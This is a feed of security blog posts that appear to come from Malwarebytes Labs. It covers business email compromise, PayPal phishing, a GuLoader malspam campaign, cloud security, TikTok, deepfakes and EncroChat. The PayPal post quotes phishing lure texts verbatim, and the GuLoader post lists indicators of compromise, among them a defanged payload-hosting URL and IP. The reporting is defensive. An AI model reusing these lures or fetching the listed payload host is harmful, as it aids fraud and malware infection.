IT NEWS

Business email compromise: gunning for goal

The evergreen peril of business email compromise (BEC) finds itself in the news once more. This time, major English Premier League football teams almost fell victim to their trickery, to the tune of £1 million.

First half: fraudsters on the offensive

Somebody compromised a Managing Director’s email after they logged into a phishing portal via bogus email. Fake accounts set up during the transfer window to buy and sell players provided the required opening. They inserted themselves into the conversations with ease. Both clubs were conversing with fakes, as the fraudsters changed banking details for payment. No money reached the scammers, as the bank recognised the fraudulent bank account.

As with so many BEC attacks, the weak point was unsecured email with no additional measures in place. Some 2FA would have helped immeasurably here, along with additional precautions. We’ve talked about this previously, where organisations may have to accept some slowdown in their activities behind the scenes for the extra protection afforded. Does the CEO need to confirm wires over the phone with someone in another timezone? Will it slow things down a little?

That is, for some, the cost of (scammers) doing business. The trick is trying to come up with solutions that work best for you, in a way which doesn’t meet with objections from both the board and the people making use of these processes daily.

The sporting sector is under attack digitally on all fronts at the moment. You can read about some of the other attacks, and a few more BEC-related shenanigans, in the NCSC report.

Second half: BEC keeps the pressure up

BEC scams have gained a lot of visibility these past few weeks.

Big financial losses sit alongside the embarrassment of going public of compromise. We almost certainly don’t know the true extent of the damage. Ransomware and similar blackmail threats cause similar problems when trying to estimate impact.

BEC isn’t just some sort of amateur hour, either. The pros are absolutely doing what they can in this realm to further enhance their profits.

Extra time: the long arm of the law

Organisations and people often realise too late that sending wires means the cash is gone forever. The attack replies on stealth and making away with the money without anybody noticing until it’s too late.

On the other hand, busts do happen. Turns out being massively visible with some 2.4 million Instagram followers might not be the best way to remain Guy Incognito. After a little under 1 million dollars was swiped from a victim in the US, the FBI found evidence of communications between a popular social media star and the alleged co-conspirators of the fraud. The FBI filed a criminal complaint in June which alleges all the social media star’s wealth is gained illegally.

Interestingly, there’s mention of yet another attempt on an English premier league football club. This time, however, the money up for grabs is significantly larger:  £100 million, versus £1 million.

Ouch.

Penalties: one final multi-pronged attack

It’s not just the standard BEC we need to be concerned about. There’s a lot of divergent routes into your business originating from roughly the same starting position. Vendor email compromise is something gaining prominence since its more well-known sibling came to light, so add that to the growing list of things to defend against. The successful attack on a major European cinema chain for $21 million is starting to seem like small potatoes at this point, though most definitely not for anyone caught in the fallout.

Some scammers roll with malware. For others, it’s a case of burning a horribly expensive exploit. The hope is that it’ll make several times the amount paid for it initially. The rest lurking in the shadows? Big money from malvertising, or gaming social media with a splash of viral spread and a lot of stolen clicks.

Meanwhile, over there, we have a group of people piecing together the inner workings of your organisation from information freely available online. At this very moment, they’re considering sending some innocent missive, just to see if the mail address is live and if the person responsible for it replies.

You won’t hear from them again…but you almost certainly will see a mail from something claiming to be your system administrator urging you to reset your login details.

Where both you and your organisation’s cash reserves end up after that, is entirely down to whatever planning was made beforehand.

How ready will you be when the business email compromisers come calling?

The post Business email compromise: gunning for goal appeared first on Malwarebytes Labs.

Lock and Code S1Ep12: Pinpointing identity and access management’s future with Chuck Brooks

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Chuck Brooks, cybersecurity evangelist and adjunct professor for Georgetown University’s Applied Intelligence Program and graduate Cybersecurity Programs, about identity and access management technology.

This set of technologies and policies controls who accesses what resources inside a system—from company files being locked away for only some employees, to even your online banking account being accessible only to you.

But with more individuals using more accounts to access more resources than ever before, threats have similarly emerged.

Tune in to hear about the uses of identity and access management technology, how the tech will be influenced by other technologies in the future, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes storeGoogle Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on: 

Other cybersecurity news

Stay safe, everyone!

The post Lock and Code S1Ep12: Pinpointing identity and access management’s future with Chuck Brooks appeared first on Malwarebytes Labs.

Avoid these PayPal phishing emails

For the last few weeks, there’s been a solid stream of fake PayPal emails in circulation, twisting FOMO (fear of missing out) into DO THIS OR BAD THINGS WILL HAPPEN. It’s one of the most common tools in the scammer’s arsenal, and a little pressure applied in the right way often brings results for them.

Claim people are going to lose something, or incur charges, or miss out on a valuable service, and they’ll come running. Below is an outline of who these emails claim to be from, what they look like, and the kind of panic-clicking that they’re pushing. These are just a few examples; there are many, many others.

Common factors

Most of the mails we’ve seen claim to be sent from

Secure(AT)intl-limited(DOT)com

Or variations thereof, although the actual email being used is frequently just a mishmash of random letters / words / numbers. They also mostly make claims that your account is limited, or restricted in some way, or there’s been some unusual activity on your account and now you must  prove you were the one making (non-existent) transactions.

It’s very similar to this batch of missives from 2015, where scammers were after credit card / payment  details. Here’s some of the mails, to give you an idea of what to look out for. They are typically awash with typos, and we’ve not corrected any of their mistakes.

scammail 1
Click to Enlarge

Scam mails

Re: [Important] – Your account was temporary limited

We would like to inform you of certain modifications to our user contracts which concern you.

No action is required on your part. However, if you would like to know more, we invite you to consult our Policy Updates page where you will find the details of these modifications, in which cases they apply and how to refuse them, if applicable.

After a recent review of your account activity. we’ve determined you are in violation of PayPal’s Acceptable Use Policy. Your account has been limited until we hear from you. While your account is limited, some options in your account won’t be available.

Re: [Renewal of the Order Receipt] Sign Up for Bank Statement Updates use Google Chrome from Marshall Islands

Dear Customer Service

Your paypal account has been limited because we’ve noticed significanyt changes in your account activity. As your payment ptocessor, we need to understand these changes better. This account limitation will affectr your ability to:

Send or receive money

Withdraw money from your account

Add or remove a card & bank account

Dispute a transaction

Close your account

What to do next?

Please logi in to your paypal account and proviude the requested information thought {SIC} the resolution center

Re: Submitted : Statement update login with Google Chrome From Taiwan, Province of China

Your PayPal account has been limited

Dear Customer,

Our service is improving the security system for all PayPal account. The reason, many accounts have been hacked by someone to order an item using a credit / debit / bank card in account associated.

For the convenience and security of PayPal, we have limited all accounts registered.

PayPal is the safer, faster way to pay. To recovery your account, you can click the link button below and proceed with identity verification to prove that it is your account.

Re: Reminder: [Daily Report] [Update News] [System known] Update-informatie zie factuur van – Statement Update New Login

Your paypal account is temporarily limited

Hello client,

We noticed that you’ve been using your Paypal account in a questionable manner. To understand this better, we just need more information from you.

To ensure that your account remains secure, we need you to take action on your account. We’ve also temporarily limited certain features in your account

Currently, You won’t be able to:

• Send Payments

• Withdraw Funds

What should you do?

Log in to your Paypal account follow the steps and perform the required tasks.

RE: Reminder: [Daily Report] [Statement Agreement] We have sent notifications. Automatic updates 

Your account has been limited.

Hello, Customer

We’ve limited your account

After a recent review of your account activity, we’ve determined you are in violation of PayPal’s Acceptable Use Policy. Please log in to confirm your identity and review all your recent activity

You can find the complete PayPal Acceptable Use Policy by clicking Legal at the bottom of any PayPal page.

Help and advice for avoiding scams

PayPal has expanded its security resources in recent years. They now have a portal for multiple forms of suspicious activity, a section for reporting phish scams, and protection for buyers and sellers.

You can also check out part 1 of our 3-part Phishing 101 guide.

These emails won’t be drying up anytime soon, so please be on your guard and, as always, visit the PayPal website directly from your browser should you receive any messages claiming you’ve been limited or locked out. If it’s genuine, then customer service will be able to assist. If it isn’t, help both PayPal and everyone else by reporting the phish. It’s a win-win scenario.

The post Avoid these PayPal phishing emails appeared first on Malwarebytes Labs.

Malspam campaign caught using GuLoader after service relaunch

They say any publicity is good publicity. But perhaps this isn’t true for CloudEye, an Italian firm that claims to provide “the next generation of Windows executables’ protection”.

First described by Proofpoint security researchers in March 2020, GuLoader is a downloader used by threat actors to distribute malware on a large scale. In June, CloudEye was exposed by CheckPoint as the entity behind GuLoader.

Following the spotlight from several security firms and news outlets, GuLoader activity dropped in late June. But around the second week of July, we started seeing the downloader in malspam campaigns again.

Protection and evasion attract criminal element

While the concept of downloaders is certainly not new, GuLoader itself found its origins in DarkEye Protector, a crypter sold in various forums circa 2011, which later evolved into CloudEye.

Designed as a product to prevent reverse engineering and protect against other forms of code theft, CloudEye is a Visual Basic 6 downloader that leverages cloud services to store and retrieve the final piece of software (in the form of heavily obfuscated shellcode) a customer wants to install.

GuLoader/CloudEye has proved to be very effective at bypassing sandboxes and security products including network-based detection.

evasion
Figure 1: GuLoader executed in a sandbox and detecting it

This is exactly the kind of feature criminals may want to distribute their malware. Unsurprisingly, this is exactly what happened and at one point GuLoader became the most popular malicious attachment in our spam honeypot.

malspam
Figure 2: Most popular attachments by tags in Malwarebytes email telemetry

Back in business

On July 11, CloudEye announced it was resuming its business after about a month of interruption during which time sales stopped and accounts used by malicious actors were banned.

service resume
Figure 3: CloudEye website announcing return of service

What prompted us to visit the company’s website and see this announcement was seeing GuLoader in the wild back again. We noted malspam activity using the classic DHL delivery lure pushing GuLoader again:

Guloader malspam
Figure 4: Malspam using DHL theme to push GuLoader

GuLoader and stealers

The attachment is an ISO file type which Windows 10 can open by mounting it as a drive. Inside, it contains the GuLoader executable written in Visual Basic. Usiung a decompiler, you can reveal one of its forms, which is very typical of GuLoader:

form
Figure 5: Decompiled view of GuLoader showing VB form

When you execute it, it will attempt to connect to a remote server to download its payload. By the time we checked this sample, that website no longer responded. However, a PCAP file was available on VirusTotal and allowed us to ‘trick’ the malware so it would proceed to load it as normal.

flow pe sieve
Figure 6: Dumping shellcode from memory to disk

We used PE-Sieve to reconstruct the encrypted payload as a standalone PE file. This allows us to dump the shellcode from memory into a file on disk.

encoded decoded
Figure 7: Comparing shellcode with file on disk

It turned out to be the FormBook stealer, which is consistent with the type of payloads we see associated with GuLoader.

Popular tool already cracked?

We believe one particular threat group is engaged in malspam campaigns with and without GuLoader, and instead using RAR attachments to spread other stealers.

Once a tool has proved to be popular and effective for criminal purposes (whether it was built for legitimate reasons or not), it will continue to fuel malware campaigns.

It’s quite possible that of the many builders of GuLoader in circulation some have been cracked and are now being used by threat actors on their own accord.

We track the GuLoader malspam campaigns and continue to protect our customers against this threat.

nebula dashboard
Figure 8: Malwarebytes Nebula’s detection of GuLoader

Thanks to S!Ri for the heads up on the return of GuLoader.

Indicators of Compromise

GuLoader

DHL_AWB_INV_9882900_99862788_998.exe
8a13de21c0cb1d10e4ee93394794e0714f4a58994be543ac94592b6f8abc53dc

Shellcode loaded by GuLoader

fbdoskitryupanel.webredirect[.]org/uploud/5bab0b1d864615bab0b1d864b3/bin_koLHz220.bin
45.76.45[.]167

Decoded shellcode into binary

7b4d3b6eb50a072d36f6233aeb56352735c59dd54ba54d6e6fbca6b23a1739d5

The post Malspam campaign caught using GuLoader after service relaunch appeared first on Malwarebytes Labs.

Cloud workload security: Should you worry about it?

Due to the increasing use of the cloud, organizations find themselves dealing with hybrid environments and nebulous workloads to secure. Containerization and cloud-stored data have provided the industry with a new challenge. And while you can try to make the provider of cloud data storage responsible for the security of the data, you will have a hard time trying to convince the provider that they are responsible for your cloud workload security.

What are you talking about?

Let us explain some of the less common terms for those that are unfamiliar with them.

The goal of containerization is to allow applications to run in an efficient and bug-free way across different computing environments, whether that is a desktop or virtual machine or Windows or Linux operating system. The demand for applications to run consistently among different systems and infrastructures has moved development of this technology along at a rapid pace. The use of different platforms within business organizations and the move to the cloud are undoubtedly huge contributors to this demand. Containerization is almost always conducted in a cloud environment, which contributes to its scalability.

While there are many providers of cloud data storage, providers that offer containerization services for the moment are almost exclusively the big players, like Amazon Web Services, Oracle, and Microsoft Azure.

Static, or even constantly changing, data are easier to protect than active processes. And a cloud workload can range from simple web applications to complex organization-specific workflow management systems.

Cloud workload security

From a security standpoint, the isolation between containers is a good thing. If one container is compromised, it is almost impossible for any malware to cross over to another container, as the top layer operating system has separate namespaces for each of the containers. But as you can imagine, this separation also makes it harder to devise a security solution for the whole complex of containers that are in use.

Traditionally, security software was designed to keep your IT environment protected from the outside world. Nowadays cutting the environment off from the outside world would mean cloud resources to become unavailable and remote workers to be disconnected from the company network. Because security was one of the major concerns holding organizations back from moving their data and workload to the cloud, a lot of attention has been given to cloud workload security.

The first step to expand your security perimeter to include the cloud workload is to make the cloud environment secure-by-design. Which means that attention has been given to security implications during every step of the design.

Your IT department and cloud resources

One common mistake is that organizations or teams within the organization start using cloud resources without involving their in-house IT/security department. While this may seem trivial or they may not even be thinking of the new “app” as a cloud resource, it does have an impact on the security perimeter and the responsible team should be aware of the change.

Organization of cloud security

The way cloud security is organized depends very much on where the responsibility for the security of the cloud resources lie. They vary from a completely in-house model to a fully external model where the cloud security provider takes full responsibility for all the resources and provides the necessary security layers.

Application layer

Web applications are secured in the application layer. This layer generally consists of a few elements designed to protect the applications from outside threats. The main element can be a customized firewall combined with end-to- end encryption. This will shield the applications from threats and protect the data-stream from being intercepted and read.

Hypervisor layer

Another important layer for cloud workload security is the hypervisor layer. The security setup in this layer will be designed to keep the cloud server’s virtualization environment safe. In this environment you will find the guest operating systems and virtual networks. This layers’ security will also take care of the containers that are running in virtual machines. The main component for the security in this layer will be application hardening. In-house apps need to be coded with security in mind and third-party software needs to be updated and patched in a timely manner.

Security orchestration

In such a layered and complex environment another important element is the security orchestration. Orchestration in this context implies:

  • Solutions working together without interrupting each other.
  • Streamlining workflow processes so that each component does what it does best.
  • Unification so that data is exported in a user-friendly and organized manner.

Security orchestration is ideally possible even when security software comes from different vendors. However, it often needs to be modified to get the most out of what the solutions have to offer, without one interfering with the effectivity of another.

In general, it’s easier to effectively orchestrate specialized applications from different vendors than it is to orchestrate overlapping applications from different vendors. The overlap between rivalling applications tends to be the field where the accidents happen. Either because features are disabled so they do not cause interference, or because one application is expected to catch something and the other doesn’t need to watch that area.

Rise in importance

As cloud applications continue to grow in absolute numbers and relative size for your organization it is imperative to look at the structure and organization of your security perimeter and into the way you want to secure that perimeter. Some points of attention as your organization grows in this direction:

  • Stay on top of the awareness of the security and IT teams of all cloud applications.
  • Scout the possibilities of security applications from different vendors and how you can best manage and orchestrate them.
  • Inform yourself about the different types of cloud-based applications you are using and whether they need a specific security approach.
  • Do not rely on your cloud provider to have security automatically arranged for you. If you do decide to rely on the cloud services provider for security arrangement as well, make sure you and your IT staff are aware of the boundaries and limitations of their coverage.

Stay safe everyone!

The post Cloud workload security: Should you worry about it? appeared first on Malwarebytes Labs.

TikTok is being discouraged and the app may be banned

In recent news retail giant Amazon sent a memo to employees telling them to delete the popular social media app TikTok from their phones. In the memo it stated that the app would pose a security risk without going into details. Later the memo was withdrawn without an explanation except that it was sent in error. Are we curious yet, my dear Watson?

What is TikTok

For those of us that can’t tell one social media app from another, TikTok is one of the most popular ones and it was especially designed to allow users to upload short video’s for others to like and share. Functionality has grown from a basic lip-sync app to host a wide variety of short video clips. It is predominantly popular among a younger audience. Most of the users are between 13 and 24 years old. In the first quarter of 2019, TikTok was the most downloaded app in the App Store, with over 33 million installs. TikTok is owned by a Chinese tech company called ByteDance.

Nation states’ attention

This wasn’t the first time TikTok faced removal from a number of devices. India already banned TikTok. And the USA and Australia are also considering blocking the app. In fact, In December, the US Army banned TikTok from its phones, and in March, US senators proposed a bill that would block TikTok from all government devices.

Is TikTok safe?

For starters, TikTok being a Chinese product does not help. A number of Chinese apps and software packages have been under investigation and were found to be “calling home”. Now this does not automatically they are spying on you, but when you start your investigation with a negative expectation, you are inclined to see it as such. And gathering information about a client without their consent is wrong.

The fact that TikTok is different in China itself, where it goes under the name Douyin, is another factor. But this could be explained away as well as China has a reputation of spying on its population. So maybe the foreign version is less intrusive then the domestic one. And some governments have their own reasons not to trust anything from Chinese origin or another agenda to boycott products originating from China.

Adding to the suspicion a Reddit user by the handle of bangorlol posted comments about the data found to be sent home when he reverse-engineered the app. The same user has started a thread on reddit where he wishes to cooperate with other reverse-engineers on newer versions of the app. One type of behavior that was confirmed by another source is that the app copies information from the clipboard. Which certainly is something that goes above and beyond what other social media apps do.

TikTok’s defense

TikTok’s main defense consists of the fact that most of their senior staff are outside of China. On their blog they also specified where their data are stored and that the data are not subject to Chinese law.

“TikTok is led by an American CEO, with hundreds of employees and key leaders across safety, security, product, and public policy here in the US. We have never provided user data to the Chinese government, nor would we do so if asked.”

Options to ban TikTok completely

Besides organizations like Wells Fargo and some branches of the US military asking their employees to refrain using the app on devices that also contain data about the organization, we have also seen countries advocating a total ban of the app. But this is not an easy goal to achieve and could also prove to be ineffective.

For a total ban of an app you would have to get it removed from the official playstores. This is harder to achieve for some countries than for others. India banned TikTok along with 58 other Chinese apps. The US government would have to find a legally sound reason to request that Apple and Google pull TikTok from their app stores and would probably meet with a lot of resistance.

Besides if people want to install a popular app like TikTok there are many other sources. Downloads are not limited to the official playstores, so a determined user will be able to find the app elsewhere. And it does not stop the millions of active users from continuing to use the app.

Another option is to give TikTok the same treatment as was handed to Huawei. Put them on the Commerce Departments’ entity list which would deny them access to US technology. Given the circumstances that doesn’t accomplish much more than denying them access to the playstores with the same consequences as we discussed above.

Social media and privacy

We have warned many times against posting privacy sensitive information on social media and guiding you and your children to use social media in a safe way. We even posted a guide for those that wanted to remove themselves from the major social media.

But when the social media app itself is determined to mine your data it becomes a whole different story. We have seen no conclusive proof that this is true for TikTok, but some of the allegations are very serious and seem to be supported by facts and authoritative research.

Anonymous warns about TikTok

Other analysts discarded the researchers’ findings as jumping to conclusions. On thing is for sure: a full analysis without the help of the developers will take a lot of effort and time and even then, the results may still be disputable. At this point we can not be sure whether the TikTok app is spying on its users in a way that goes deeper than we might expect from an ordinary social media app.

All we can do at this point is to inform our users about the ongoing discussion and maybe explain some of the points that are being brought up. We also feel the need to repeat our warnings about the difficult relationship between social media and privacy. Obviously if any concrete facts should surface we will keep you posted.

Stay safe everyone!

The post TikTok is being discouraged and the app may be banned appeared first on Malwarebytes Labs.

A week in security (July 20 – 26)

Last week on Malwarebytes Labs, our Lock and Code podcast delved into Bluetooth and beacon technology. We also dug into APT groups targeting India and Hong Kong, covered a law enforcement bust, and tried to figure out when, exactly, a Deepfake is a Deepfake.

Other cybersecurity news

Stay safe!

The post A week in security (July 20 – 26) appeared first on Malwarebytes Labs.

Deepfakes or not: new GAN image stirs up questions about digital fakery

Subversive deepfakes that enter the party unannounced, do their thing, then slink off into the night without anybody noticing are where it’s at. Easily debunked clips of Donald Trump yelling THE NUKES ARE UP or something similarly ludicrous are not a major concern. We’ve already dug into why that’s the case.

What we’ve also explored are the people-centric ways you can train your eye to spot stand-out flaws and errors in deepfake imagery—essentially, GANS (generative adversarial networks) gone wrong. There will usually be something a little off in the details, and it’s up to us to discover it.

Progress is being made in the realm of digital checking for fraud, too, with some nifty techniques available to see what’s real and what isn’t. As it happens, a story is in the news which combines subversion, the human eye, and even a splash of automated examination for good measure.

A deepfake letter to the editor

A young chap, “Oliver Taylor” studying at the University of Birmingham found himself with editorials published in major news sources such as Time of Israel and Jerusalem Post, with his writing “career” apparently  kicking into life in late 2019, with additional articles in various places throughout 2020.

After a stream of these pieces, everything exploded in April when a new article from “Taylor” landed making some fairly heavy accusations against a pair of UK-based academics.

After the inevitable fallout, it turned out that Oliver Taylor was not studying at the University of Birmingham. In fact, he was apparently not real at all and almost all online traces of the author vanished into the ether. His mobile number was unreachable, and nothing came back from his listed email address.

Even more curiously, his photograph bore all the hallmarks of a deepfake (or, controversially, not a “deepfake” at all; more on the growing clash over descriptive names later). Regardless of what you intend to class this man’s fictitious visage as, in plain terms, it is an AI-generated image designed to look as real as possible.

Had someone created a virtual construct and bided their time with a raft of otherwise unremarkable blog posts simply to get a foothold on major platforms before dropping what seems to be a grudge post?

Fake it to make it

Make no mistake, fake entities pushing influential opinions is most definitely a thing. Right leaning news orgs have recently stumbled into just such an issue. Not so long ago, an astonishing 700 pages with 55 million followers were taken down by Facebook in a colossal AI-driven disinformation blowout dubbed “Fake Face Swarm.” This large slice of Borg-style activity made full use of deepfakes and other tactics to consistently push political messaging with a strong anti-China lean.

Which leads us back to our lone student, with his collection of under-the-radar articles, culminating in a direct attack on confused academics. The end point—the 700 pages worth of political shenanigans and a blizzard of fake people—could easily be set in motion by one plucky fake human with a dream and a mission to cause aggravation for others.

How did people determine he wasn’t real?

Tech steps up to the plate

A few suspicions, and the right people with the right technology in hand, is how they did it. There’s a lot you can do to weed out bogus images, and there’s a great section over on Reuters that walks you through the various stages of detection. No longer do users have to manually pick out the flaws; technology will (for example) isolate the head from the background, making it easier to see frequently distorted flaws. Or perhaps we can make use of heatmaps generated by algorithms to highlight areas most suspected of digital interference.

Even better, there are tools readily available which will give you the under-the-hood summary of what’s happening with one image.

Digging in the dirt

If you edit a lot of photographs on your PC, you’re likely familiar with EXIF metadata. This is a mashing together of lots of bits of information at the moment the photo is taken. Camera/phone type, lens, GPS, colour details—the sky’s the limit. On the flipside, some of it, like location data, can potentially be a privacy threat so it’s good to know how to remove it if needs be.

As with most things, it really depends what you want from it. AI-generated images are often no different.

There are many ways to stitch together your GAN imagery. This leaves traces, unless you try to obfuscate it or otherwise strip some information out. There are ways to dig into the underbelly of a GAN image, and bring back useful results.

Image swiping: often an afterthought

Back in November 2019, I thought it would be amusing if the creators of “Katie Jones” had just lazily swiped an image from a face generation website, as opposed to agonising over the fake image details.

For our fictitious university student, it seems that the people behind it may well have done just that [1], [2]. The creator of the site the image was likely pulled from has said they’re looking to make their images no longer downloadable, and/or place people’s heads in front of a 100 perceNT identifiably fake background such as “space.” They also state that “true bad actors will reach for more sophisticated solutions,” but as we’ve now seen in two high-profile cases, bad actors with big platforms and influential reach are indeed just grabbing whatever fake image they desire.

This is probably because ultimately the image is just an afterthought; the cherry on an otherwise bulging propaganda cake.

Just roll with it

As we’ve seen, the image wasn’t tailor-made for this campaign. It almost certainly wasn’t at the forefront of the plan for whoever came up with it, and they weren’t mapping out their scheme for world domination starting with fake profile pics. It’s just there, and they needed one, and (it seems) they did indeed just grab one from a freely-available face generation website. It could just as easily have been a stolen stock model image, but that is of course somewhat easier to trace. 

And that, my friends, is how we end up with yet another subtle use of synthetic technology whose presence may ultimately have not even mattered that much.

Are these even deepfakes?

An interesting question, and one that seems to pop up whenever a GAN-generated face is attached to dubious antics or an outright scam. Some would argue a static, totally synthetic image isn’t a deepfake because it’s a totally different kind of output.

To break this down:

  1. The more familiar type of deepfake, where you end up with a video of [movie star] saying something baffling or doing something salacious, is produced by feeding a tool multiple images of that person. This nudges the AI into making the [movie star] say the baffling thing, or perform actions in a clip they otherwise wouldn’t exist in. The incredibly commonplace porn deepfakes would be the best example of this.
  2. The image used for “Oliver Taylor” is a headshot sourced from a GAN which is fed lots of images of real people, in order to mash everything together in a way that spits out a passable image of a 100 percent fake human. He is absolutely the sum of his parts, but in a way which no longer resembles them.

So, when people say, “That’s not a deepfake,” they’re wanting to keep a firm split between “fake image or clip based on one person, generated from that same person” versus “fake image or clip based on multiple people, to create one totally new person.”

The other common negative mark set against calling synthetic GAN imagery deepfakes, is that the digital manipulations are not what make it effective. How can it be a deepfake if it wasn’t very good?

Call the witnesses to the stand

All valid points, but the counterpoints are also convincing.

If we’re going to dismiss their right to deepfake status because digital manipulations are not effective, then we’re going to end up with very few bona-fide deepfakes. The digital manipulations didn’t make it effective, because it wasn’t very good. By the same token, we’d never know if digital manipulations haven’t made a good one because we’d miss it entirely as it flies under the radar.

Even the best movie-based variants tend to contain some level of not-quite-rightness, and I have yet to place a bunch before me where I couldn’t spot at least nine out of 10 GAN fakes mixed in with real photos.

As interesting and as cool as the technology is, the output is still largely a bit of a mess. From experience, the combo of a trained eye and some of the detection tools out there make short work of the faker’s ambitions. The idea is to do just enough to push whatever fictional persona/intent attached to the image is over the line and make it all plausible—be it blogs, news articles, opinion pieces, bogus job posting, whatever. The digital fakery works best as an extra chugging away in the background. You don’t really want to draw attention to it as part of a larger operation.

Is this umbrella term a help or a hindrance?

As for keeping the tag “deepfake” away from fake GAN people, while I appreciate the difference in image output, I’m not 100 percent sure that this is necessarily helpful. The word deepfake is a portmanteau of “deep learning” and “fake.” Whether you end up with Nicolas Cage walking around in The Matrix, or you have a pretend face sourced from an image generation website, they’re both still fakes borne of some form of deep learning.

The eventual output is the same: a fake thing doing a fake thing, even if the path taken to get there is different. Some would argue this is a potentially needless and unnecessary split/removal of a catch-all definition which manages to helpfully and accurately apply to both above—and no doubt other—scenarios.

It would be interesting to know if there’s a consensus in the AI deep learning/GAN creation/analyst space on this. From my own experience talking to people in this area, the bag of opinions is as mixed as the quality from GAN outputs. Perhaps that’ll change in the future.

The future of fakery detection

I asked Munira Mustaffa, Security Analyst, if automated detection techniques would eventually surpass the naked eye forever:

I’ve been mulling over this question, and I’m not sure what else I could add. Yes, I think an automated deepfake checking can probably make better assessment than the human eye eventually. However, even if you have the perfect AI to detect them, human review will always be needed. I think context also matters in terms of your question. If we’re detecting deepfakes, what are we detecting against?

I think it’s also important to recognise that there is no settled definition for what is a deepfake. Some would argue that the term only applies to audio/videos, while photo manipulations are “cheapfakes”. Language is critical. Semantics aside, at most, people are playing around with deepfakes/cheapfakes to produce silly things via FaceApp. But the issue here is really not so much about deepfakes/cheapfakes, but it is the intent behind the use. Past uses have indicated how deepfakes have been employed to sway perception, like that Nancy Pelosi ‘dumbfake’ video.

At the end of the day, it doesn’t matter how sophisticated the detection software is if people are not going to be vigilant with vetting who they allow into their network or who is influencing their point of view. I think people are too focused on the concept that deepfakes’ applications are mainly for revenge porn and swaying voters. We have yet to see large scale ops employing them. However, as the recent Oliver Taylor case demonstrated to us, deepfake/cheapfake applications go beyond that.

There is a real potential danger that a good deepfake/cheapfake that is properly backstopped can be transformed into a believable and persuasive individual. This, of course, raises further worrying questions: what can we do to mitigate this without stifling voices that are already struggling to find a platform?

We’re deepfakes on the moon

We’re at a point where it could be argued deepfake videos are more interesting conceptually than in execution. MIT’s Centre for Advanced Virtuality has put together a rendition of the speech Richard Nixon was supposed to give if the moon landing ended in tragedy. It is absolutely a chilling thing to watch; however, the actual clip itself is not the best technically.

The head does not play well with the light sources around it, the neckline of the shirt is all wrong against the jaw, and the voice has multiple digital oddities throughout. It also doesn’t help that they use his resignation speech for the body, as one has to wonder about the optics of shuffling papers as you announce astronauts have died horribly.

No, the interesting thing for me is deciding to show the deceptive nature of deepfakes by using a man who was born in 1913 and died 26 years ago. Does anyone under the age of 40 remember his look, the sound of his voice outside of parody and movies well enough to make a comparison? Or is the disassociation from a large chunk of collective memory the point? Does that make it more effective, or less?

I’m not sure, but it definitely adds weight to the idea that for now, deepfakes—whether video or static image—are more effective as small aspects of bigger disinformation campaigns than attention drawing pieces of digital trickery.

See you again in three months?

It’s inevitable we’ll have another tale before us soon enough, explaining how another ghostly entity has primed a fake ID long enough to drop their payload, or sow some discord at the highest levels. Remember that the fake imagery is merely one small stepping stone to an overall objective and not the end goal in and of itself. It’s a brave new world of disruption, and perhaps by the time you’re pulling up another chair, I might even be able to give you a definitive naming convention.

The post Deepfakes or not: new GAN image stirs up questions about digital fakery appeared first on Malwarebytes Labs.

EncroChat system eavesdropped on by law enforcement

Due to the level of sophistication of the attack, and the malware code, we can no longer guarantee the security of your device.

This text caused a lot of aggravation, worries, and sleepless nights. No one wants to hear the security of their device has been compromised by a malware attack. The good news is that the actual victims of this malware attack were almost exclusively criminals. The bad news is that the message was sent out by a provider called EncroChat, which had previously billed itself as private as an in-person conversation in a soundproof room.

EncroChat provides customers with secure messaging and cryptophones. Their cryptophones run on the OTR operating system. Short for Off-The-Record, OTR is a cryptographic protocol that provides both authentication and end-to-end encryption for instant messaging. This protocol ensures that session keys will not be compromised even if the private key of the server is compromised. Even when a server is seized, the conversations cannot be decrypted or lead back to the participants.

What happened to EncroChat?

EncroChat, a company based in the Netherlands, advertises their services as safer than safe, stating that no messages are saved on their servers, which are located “offshore.” But at some point, Dutch law enforcement figured out the EncroChat servers were located in France and got to work, hoping to catch criminals in the act.

Decryption specialists that had been involved in the Ennetcom (Canada) and PGP Safe (Costa Rica) cases were consulted and managed to access the EncroChat systems—their method of access is still unknown to the public. When asked how they managed to follow conversations on EncroChat, Netherlands’ Team High Tech Crime chose not to answer. They may have hopes to use the method again in the future with another service.

Based on the information disclosed by EncroChat, it is likely that law enforcement agencies managed to install software on the servers that provided the phones with updates or delivered malware to the phones in another form. Either way, infecting devices allowed them to see the unencrypted messages. In essence, with enough infected devices, law enforcement was able to follow conversations in real time.

The warning that EncroChat sent out said:

They repurposed our domains to launch an attack to comprise carbon units. With control of our domain they managed to launch a malware campaign against the carbon to weaken its security.

Another clue supporting this takeaway was the fact that some users complained that the wipe function no longer worked, an indication that the malware was active at the device level.

What happened to EncroChat users?

Hundreds of arrests have already been made in the UK, the Netherlands, France, the Middle East, and a few other countries. On top of that, law enforcement has millions of chat messages that can lead to more arrests or serve as evidence in upcoming lawsuits. International drug traffickers have been hit especially hard by the service going bust.

But law enforcement’s move to access encrypted conversations sets up a dangerous precedent. Likely, the police had to act immediately on information that was potentially life threatening. However, without knowledge on how or why they breached the EncroChat system, their actions made encrypted chat users and operators suspicious about a possible leak. A criminal in the UK was confronted with an EncroChat message dating back to the end of 2019, so law enforcement agencies must have been monitoring the service for many months before users found out the system was compromised.

Why were so many criminals using EncroChat?

The EncroChat system was well organized and had gained a lot of trusting users over the years. Criminals felt secure enough to chat freely about everything: names of customers, drug deliveries, and even assassinations. And their trust was understandable, given what EncroChat had to offer:

  • Phones were dual boot, so users could alternatively start the Android operating system and their phones would look like a normal, old-fashioned model.
  • The phones had a “wipe all” button that would delete all the stored conversations in case of an arrest or other emergency.
  • No messages were stored on servers so they could not be seized and decrypted later.
  • OTR, unlike PGP, cannot be fully reconstructed even if you have both encryption keys.

EncroChat users paid hefty fees for this service— thousands of dollars per year, per device. The exorbitant fees may explain why the majority of the EncroChat clientele could be found on the wrong side of the law. Other parties that might have a vested interest in keeping their chat messages secret include government parties, journalists, security professionals, or lawyers. However, there are cheaper, if somewhat less sophisticated, alternatives for legitimate secret-keeping that law enforcement does not target.

After law enforcement agencies had taken down or compromised other providers, many European criminals flocked to EncroChat. An estimate by the French police indicated that 90 percent of the EncroChat users were engaged in criminal activity. However, of the 60,000 EncroChat end users, only 800 were arrested.

Encryption and law enforcement

